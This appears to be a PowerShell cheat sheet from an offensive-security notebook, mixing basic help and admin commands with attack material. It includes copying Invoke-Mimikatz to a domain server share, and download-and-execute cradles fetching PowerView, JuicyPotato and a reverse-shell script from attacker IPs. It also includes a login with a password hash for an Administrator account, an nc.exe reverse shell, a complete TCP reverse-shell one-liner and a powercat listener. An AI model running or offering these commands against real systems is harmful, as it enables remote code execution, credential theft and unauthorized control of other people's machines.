Powershell Fu

  • -Full : Lists full help about a topic

  • -Examples: Lists examples of how to run a a cmdlet

#Powershell Help
help *keyword*
powershell /? 
powershell -?
powershell -Help
Get-Help *

#List Everything which contains the word process
Get-Help (process_name) -Full -Examples

#List all cmdlets
Get-Command -CommandType cmdlet
#Cmdlets: List full
Get-ChildItem | Format-List  *

#Pipelining
Get-Process | Sort-Object -Unique | Select-Object ProcessName

#Default Modules directory
$Env:PSModulePath

#WMI
#List all Wmi classes
Get-CimClass
Get-WmiObject -Class Win32_Volume

#Get Alias
Get-Alias -Definition Get-ChildItem
#Updates the Help System
Update-Help

#Explore Registry
cd HKLM:\

#Scouring for files
Select-String -Path C:\Users\Dan\*.txt -Pattern pass*
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse | %{$_.FullName} 

#Open Files
Get-Content "File name.txt"

#Copy Files
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

#Hides powershell window during execution
powershell.exe -WindowStyle Hidden .\script1.ps1

#Add user to a group
Add-ADGroupMember -Identity <Group> -Members <User>

#Remove User from a Domain Group
Remove-ADGroupMember -Identity <Group> -Members <User>
Remove-LocalGroupMember -Identity <Group> -Members <User>

#Import A Module
Import-Module <modulepath>

#List All Commands In A Module
Get-Command -Module <modulename>
Get-Command -Name Firewall

#View truncated output
$FormatEnumerationLimit=-1
<Command> | out-string -Width 500
#Outputs a single string 
-<Command> | Out-string -Stream

#History
Get-History
#Path where all of the history is saved
(Get-PSReadlineOption).HistorySavePath

#Tasks
tasklist

#Services
Get-Services

#Shortcut directory
"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell"

#Run Powershell
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Check whether powershell is running as 32Bit/64Bit
[Environment]::Is64BitProcess

#Run Powershell as 64Bit Process
c:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#On a 64-Bit System, run powershell as 32Bit Process
c:\windows\sysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Base64 encode a file
$EncodedText = Get-Content "File_to_be_encoded"
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

#Execute Base64 encoded scripts
powershell -EncodedCommand $enccommand

#Download Files
Invoke-WebRequest -Uri "http://172.16.10.1/PowerView.ps1" -OutFile "PowerView.ps1"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.0.172/JuicyPotato.exe','jp.exe')"


#Download & Execute 
powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.172/JuicyPotato.exe')                                                                                                                                               Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)

#Execute Commands/Script Block
powershell.exe -Command "& {Get-EventLog -LogName security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"

#Unzip files
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip{param([string]$zipfile, [string]$outpath)[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)}
Unzip "C:\a.zip" "C:\a"
#In case of error with System.IO.Compression:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"

  • Using functions

Login as user using Powershell

  • Requires: Username:Password Hash

  • Shell access(eg:nc)

powershell.exe
$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Enter-PSSession -ComputerName localhost -Credential $credential

# To get a new shell as Administrator:
cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe 10.10.14.143 41337 -e cmd.exe"

Reverse Shells

#Download and execute
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 9001
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.19.99.39/Powerview.ps1'));Find-LocalAdminAccess
powershell.exe iex (iwr http://<IP>/File.ps1 -UseBasicParsing);Invoke-AllChecks

#One-liner Reverse-shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.188.200',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Powercat

. .\powercat.ps1
powercat -l -v -p 443 -t 1000
PreviousCredential TheftNextBest Practises

Last updated